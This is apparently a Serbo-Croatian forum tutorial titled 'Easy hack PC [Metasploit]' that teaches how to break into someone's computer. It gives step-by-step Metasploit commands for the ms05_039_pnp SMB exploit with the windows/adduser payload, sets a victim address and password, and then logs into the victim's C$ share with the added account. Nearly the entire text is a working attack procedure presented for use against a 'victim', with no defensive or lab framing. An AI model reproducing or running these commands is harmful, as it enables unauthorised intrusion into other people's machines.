ZZ svima.. Odlucio sam napisati jos jedan TuT kako nekome upasti u PC...
Radicemo po ovom scenariju:
[*] Komp napadaca ce biti: 192.168.1.9 (Linux Backtrack 5)
[*] Komp zrtve ce biti : 192.168.1.10
Prvo otvorite Metasploit konzolu...
Mozete kucati komandu "show exploits" i pritisnite ENTER, ova komanda ce vam ispisati sve exploite u Metaslpoitu... Naravno cesto updatujte Metasploit zbog odrzavanja exploita...
Zatim morate odabrati odredjeni exploit... U ovom tutorialu cemo koristiti ovaj exploit..
windows/smb/ms05_039_pnp
Da bi iskoristili exploit morate ukucati sledece :
use windows/smb/ms05_039_pnp
Kada ukucate ime exploita pritisnite ENTER i exploit je selektovan...
Zatim je potrebno podesiti PAYLOAD. Tu takodje mozte ukucati show payloads i mozete izabrati payload...
Sada ce mo koristi sledeci payload: windows/adduser
da bi payload bio selektovan morate kucati :
SET payload windows/adduser
Pritisnite ENTER i payload ce biti selektovan...
Sledece sto treba da uradite kao napadac je to da postavite zrtvu koju hocete...
kucate : show targets
i Metasploit ce vam izbaciti zrtve, tj OS koji mogu biti oboreni...
Zatim kucate :
set target 0
zatim kucate :
show options
Tu ce vam izbaciti neke opcije koje morate popuniti..
Tu je polje USER koje je vec popunjeno.. USER je METASPLOIT
U ovom slucaju prazna polja ce nam biti :
RHOST (set rhost <zrtvinaIP> i PASS (pass koji vi zelite)...
Da bi podesili ove opcije neophodno je da ih podesite..
Da bi ste podesili RHOST kucajte
Set RHOST <zrtvinaIPadresa>
a da bi ste podesili pass kucajte :
set PASS 12345 (ove mozete bilo koji pass kucati)
Kada ste podesili RHOST i PASS mozete krenuti u akciju..
sledi jedan lepsi deo..
kao zavrsnu komandu kucate exploit..
Ta komanda ce pokrenuti dati exploit na zrtvinom kompijuteru..
Ako ste dobro procitali TUT mogli ste primetiti payload koji adduje usera na zrtvin racunar...
Napadac sada trena da otvori RUN box i da kuca sledece komande...
\\192.168.1.10\c$
Pritisnite ENTER i izbacice vam LOGIN prompt...
Tu ce te kucati user i pass koji smo malo pre podesavali..
Username : Metasploit
Password: 12345
Pritisnite ENTER i trebali bi da se nalazite u zrtvinom racunaru.. Dobicete pristup njegovoj particiji u kojoj je installiran OS...
Easy hack PC [Metasploit]